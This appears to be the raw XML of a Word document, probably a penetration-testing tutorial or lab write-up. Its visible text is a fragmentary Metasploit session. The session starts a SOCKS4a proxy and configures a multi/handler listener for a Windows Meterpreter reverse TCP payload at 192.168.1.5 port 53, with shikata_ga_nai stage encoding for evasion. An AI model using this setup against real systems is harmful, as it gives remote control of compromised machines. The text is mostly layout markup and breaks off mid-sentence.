        <v:shape style="position:absolute;left:1177;top:13537;width:82;height:342" coordorigin="1177,13537" coordsize="82,342" path="m1217,13546l1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13546,1217,13547,1217,13547,1217,13547,1217,13547,1217,13547,1217,13548,1217,13548,1217,13548,1217,13548,1217,13549,1217,13549,1217,13550,1217,13550,1217,13550,1217,13551,1217,13551,1217,13552,1217,13553,1217,13553,1217,13554,1217,13555,1217,13555,1217,13556,1217,13557,1217,13558,1217,13559,1217,13560,1217,13561,1217,13562,1217,13563,1217,13564,1217,13565,1217,13567,1217,13568,1217,13569,1217,13571,1217,13572,1217,13574,1217,13575,1217,13577,1217,13579,1217,13580,1217,13582,1217,13584,1217,13586,1217,13588,1217,13590,1217,13593,1217,13595,1217,13597,1217,13600,1217,13602,1217,13605,1217,13607,1217,13610,1217,13613,1217,13616,1217,13619,1217,13622,1217,13625,1217,13628,1217,13631,1217,13635,1217,13638,1217,13642,1217,13645,1217,13649,1217,13653,1217,13657,1217,13661,1217,13665,1217,13669,1217,13673,1217,13678,1217,13682,1217,13687,1217,13691,1217,13696,1217,13701,1217,13706,1217,13711,1217,13717,1217,13722,1217,13727,1217,13733,1217,13739,1217,13744,1217,13750,1217,13756,1217,13762,1217,13769,1217,13775,1217,13781,1217,13788,1217,13795,1217,13802,1217,13809,1217,13816,1217,13823,1217,13830,1217,13838,1217,13845,1217,13853,1217,13861e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:692.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13857" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13857;width:82;height:322" coordorigin="1177,13857" coordsize="82,322" path="m1217,13861l1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13861,1217,13862,1217,13862,1217,13862,1217,13862,1217,13862,1217,13862,1217,13863,1217,13863,1217,13863,1217,13863,1217,13864,1217,13864,1217,13864,1217,13865,1217,13865,1217,13866,1217,13866,1217,13867,1217,13867,1217,13868,1217,13869,1217,13869,1217,13870,1217,13871,1217,13872,1217,13872,1217,13873,1217,13874,1217,13875,1217,13876,1217,13877,1217,13878,1217,13879,1217,13881,1217,13882,1217,13883,1217,13885,1217,13886,1217,13888,1217,13889,1217,13891,1217,13892,1217,13894,1217,13896,1217,13898,1217,13899,1217,13901,1217,13903,1217,13906,1217,13908,1217,13910,1217,13912,1217,13915,1217,13917,1217,13919,1217,13922,1217,13925,1217,13927,1217,13930,1217,13933,1217,13936,1217,13939,1217,13942,1217,13946,1217,13949,1217,13952,1217,13956,1217,13959,1217,13963,1217,13967,1217,13970,1217,13974,1217,13978,1217,13982,1217,13987,1217,13991,1217,13995,1217,14000,1217,14004,1217,14009,1217,14014,1217,14019,1217,14024,1217,14029,1217,14034,1217,14039,1217,14044,1217,14050,1217,14056,1217,14061,1217,14067,1217,14073,1217,14079,1217,14085,1217,14092,1217,14098,1217,14105,1217,14111,1217,14118,1217,14125,1217,14132,1217,14139,1217,14146,1217,14154,1217,14161e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:707.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14157" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14157;width:82;height:322" coordorigin="1177,14157" coordsize="82,322" path="m1217,14161l1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14161,1217,14162,1217,14162,1217,14162,1217,14162,1217,14162,1217,14162,1217,14162,1217,14163,1217,14163,1217,14163,1217,14163,1217,14164,1217,14164,1217,14164,1217,14165,1217,14165,1217,14166,1217,14166,1217,14167,1217,14167,1217,14168,1217,14168,1217,14169,1217,14170,1217,14171,1217,14171,1217,14172,1217,14173,1217,14174,1217,14175,1217,14176,1217,14177,1217,14178,1217,14179,1217,14181,1217,14182,1217,14183,1217,14185,1217,14186,1217,14187,1217,14189,1217,14191,1217,14192,1217,14194,1217,14196,1217,14198,1217,14200,1217,14202,1217,14204,1217,14206,1217,14208,1217,14210,1217,14212,1217,14215,1217,14217,1217,14220,1217,14223,1217,14225,1217,14228,1217,14231,1217,14234,1217,14237,1217,14240,1217,14243,1217,14247,1217,14250,1217,14253,1217,14257,1217,14261,1217,14264,1217,14268,1217,14272,1217,14276,1217,14280,1217,14284,1217,14289,1217,14293,1217,14297,1217,14302,1217,14307,1217,14312,1217,14316,1217,14321,1217,14327,1217,14332,1217,14337,1217,14343,1217,14348,1217,14354,1217,14360,1217,14365,1217,14372,1217,14378,1217,14384,1217,14390,1217,14397,1217,14403,1217,14410,1217,14417,1217,14424,1217,14431,1217,14438,1217,14446,1217,14453,1217,14461,1217,14468,1217,14476e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:722.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14457" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14457;width:82;height:322" coordorigin="1177,14457" coordsize="82,322" path="m1217,14476l1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14476,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14477,1217,14478,1217,14478,1217,14478,1217,14478,1217,14478,1217,14479,1217,14479,1217,14479,1217,14480,1217,14480,1217,14481,1217,14481,1217,14482,1217,14482,1217,14483,1217,14483,1217,14484,1217,14485,1217,14485,1217,14486,1217,14487,1217,14488,1217,14489,1217,14489,1217,14490,1217,14491,1217,14493,1217,14494,1217,14495,1217,14496,1217,14497,1217,14499,1217,14500,1217,14501,1217,14503,1217,14504,1217,14506,1217,14508,1217,14509,1217,14511,1217,14513,1217,14515,1217,14517,1217,14519,1217,14521,1217,14523,1217,14525,1217,14528,1217,14530,1217,14532,1217,14535,1217,14537,1217,14540,1217,14543,1217,14546,1217,14548,1217,14551,1217,14554,1217,14558,1217,14561,1217,14564,1217,14567,1217,14571,1217,14575,1217,14578,1217,14582,1217,14586,1217,14590,1217,14594,1217,14598,1217,14602,1217,14606,1217,14611,1217,14615,1217,14620,1217,14624,1217,14629,1217,14634,1217,14639,1217,14644,1217,14649,1217,14654,1217,14660,1217,14665,1217,14671,1217,14677,1217,14682,1217,14688,1217,14694,1217,14701,1217,14707,1217,14713,1217,14720,1217,14727,1217,14733,1217,14740,1217,14747,1217,14754,1217,14762,1217,14769,1217,14776e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:737.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,14757" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:14757;width:82;height:322" coordorigin="1177,14757" coordsize="82,322" path="m1217,14776l1217,14776,1217,14776,1217,14776,1217,14776,1217,14776,1217,14776,1217,14776,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14777,1217,14778,1217,14778,1217,14778,1217,14778,1217,14779,1217,14779,1217,14779,1217,14780,1217,14780,1217,14780,1217,14781,1217,14781,1217,14782,1217,14782,1217,14783,1217,14783,1217,14784,1217,14785,1217,14785,1217,14786,1217,14787,1217,14788,1217,14789,1217,14790,1217,14791,1217,14792,1217,14793,1217,14794,1217,14795,1217,14796,1217,14797,1217,14799,1217,14800,1217,14801,1217,14803,1217,14804,1217,14806,1217,14808,1217,14809,1217,14811,1217,14813,1217,14815,1217,14817,1217,14819,1217,14821,1217,14823,1217,14825,1217,14828,1217,14830,1217,14832,1217,14835,1217,14838,1217,14840,1217,14843,1217,14846,1217,14849,1217,14852,1217,14855,1217,14858,1217,14861,1217,14864,1217,14868,1217,14871,1217,14875,1217,14878,1217,14882,1217,14886,1217,14890,1217,14894,1217,14898,1217,14902,1217,14906,1217,14911,1217,14915,1217,14920,1217,14924,1217,14929,1217,14934,1217,14939,1217,14944,1217,14949,1217,14955,1217,14960,1217,14965,1217,14971,1217,14977,1217,14983,1217,14989,1217,14995,1217,15001,1217,15007,1217,15014,1217,15020,1217,15027,1217,15033,1217,15040,1217,15047,1217,15054,1217,15062,1217,15069,1217,15077e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:752.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,15057" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:15057;width:82;height:322" coordorigin="1177,15057" coordsize="82,322" path="m1217,15077l1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15077,1217,15078,1217,15078,1217,15078,1217,15078,1217,15078,1217,15079,1217,15079,1217,15079,1217,15080,1217,15080,1217,15081,1217,15081,1217,15081,1217,15082,1217,15082,1217,15083,1217,15084,1217,15084,1217,15085,1217,15086,1217,15086,1217,15087,1217,15088,1217,15089,1217,15090,1217,15091,1217,15092,1217,15093,1217,15094,1217,15095,1217,15096,1217,15098,1217,15099,1217,15100,1217,15102,1217,15103,1217,15105,1217,15106,1217,15108,1217,15110,1217,15111,1217,15113,1217,15115,1217,15117,1217,15119,1217,15121,1217,15123,1217,15126,1217,15128,1217,15130,1217,15133,1217,15135,1217,15138,1217,15140,1217,15143,1217,15146,1217,15149,1217,15152,1217,15155,1217,15158,1217,15161,1217,15164,1217,15168,1217,15171,1217,15175,1217,15178,1217,15182,1217,15186,1217,15190,1217,15194,1217,15198,1217,15202,1217,15206,1217,15211,1217,15215,1217,15220,1217,15225,1217,15229,1217,15234,1217,15239,1217,15244,1217,15249,1217,15255,1217,15260,1217,15266,1217,15271,1217,15277,1217,15283,1217,15289,1217,15295,1217,15301,1217,15307,1217,15314,1217,15320,1217,15327,1217,15334,1217,15340,1217,15347,1217,15355,1217,15362,1217,15369,1217,15377e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:767.874pt;width:4.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,15357" coordsize="82,342">
        <v:shape style="position:absolute;left:1177;top:15357;width:82;height:342" coordorigin="1177,15357" coordsize="82,342" path="m1217,15377l1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15377,1217,15378,1217,15378,1217,15378,1217,15378,1217,15378,1217,15378,1217,15379,1217,15379,1217,15379,1217,15380,1217,15380,1217,15380,1217,15381,1217,15381,1217,15382,1217,15382,1217,15383,1217,15383,1217,15384,1217,15385,1217,15385,1217,15386,1217,15387,1217,15388,1217,15389,1217,15390,1217,15391,1217,15392,1217,15393,1217,15394,1217,15395,1217,15396,1217,15397,1217,15399,1217,15400,1217,15402,1217,15403,1217,15405,1217,15406,1217,15408,1217,15410,1217,15411,1217,15413,1217,15415,1217,15417,1217,15419,1217,15421,1217,15424,1217,15426,1217,15428,1217,15431,1217,15433,1217,15436,1217,15438,1217,15441,1217,15444,1217,15447,1217,15450,1217,15453,1217,15456,1217,15459,1217,15462,1217,15465,1217,15469,1217,15473,1217,15476,1217,15480,1217,15484,1217,15488,1217,15492,1217,15496,1217,15500,1217,15504,1217,15509,1217,15513,1217,15518,1217,15522,1217,15527,1217,15532,1217,15537,1217,15542,1217,15547,1217,15553,1217,15558,1217,15564,1217,15569,1217,15575,1217,15581,1217,15587,1217,15593,1217,15599,1217,15606,1217,15612,1217,15619,1217,15626,1217,15633,1217,15639,1217,15647,1217,15654,1217,15661,1217,15669,1217,15676,1217,15684,1217,15692e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:347.399pt;height:168.6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5" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pP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auxiliary(server/socks4a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="11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8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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="118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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2313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set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payload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windows/meterpreter/reverse_tcp_uuid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payload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1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=&gt;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17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windows/meterpreter/reverse_tcp_uuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="5446" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="117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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="117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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="117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lhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="115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=&gt;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192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="6317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set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lport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53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lport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="120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53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="3773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set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stageencoder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x86/shikata_ga_nai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stageencoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="120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x86/shikata_ga_nai</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="4415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set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EnableStageEncoding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true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EnableStageEncoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="120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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="120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21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1495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set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exitonsession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false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1495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exitonsession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=&gt;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false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="611" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="6087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msf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exploit(multi/handler)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show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options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Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="121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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="121"/>
          <w:spacing w:val="4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(exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="5635" w:firstLine="0"/>
      </w:pP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Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="122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Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="134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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="134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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="13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34"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----------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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pP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Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="118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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="118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18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(windows/meterpreter/reverse_tcp_uuid):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2635"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="121"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:tab/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Current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="1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21"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2395"/>
        </w:tabs>
        <w:spacing w:before="23" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="132"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="132"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="132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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="132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w w:val="132"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-----------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4136"/>
          <w:tab w:val="left" w:pos="4871"/>
        </w:tabs>
        <w:spacing w:before="23" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pP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EXITFUNC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-110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process</w:t>
      </w:r>
      <w:r>
        <w:tab/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yes</w:t>
      </w:r>
      <w:r>
        <w:tab/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Exit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technique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3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(Accepted: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3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'',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seh,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3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thread,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3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process,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22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none)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2650"/>
          <w:tab w:val="left" w:pos="4106"/>
          <w:tab w:val="left" w:pos="4841"/>
        </w:tabs>
        <w:spacing w:before="23" w:after="0" w:line="275" w:lineRule="auto"/>
        <w:ind w:left="1675" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:w w:val="112"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:w w:val="112"/>
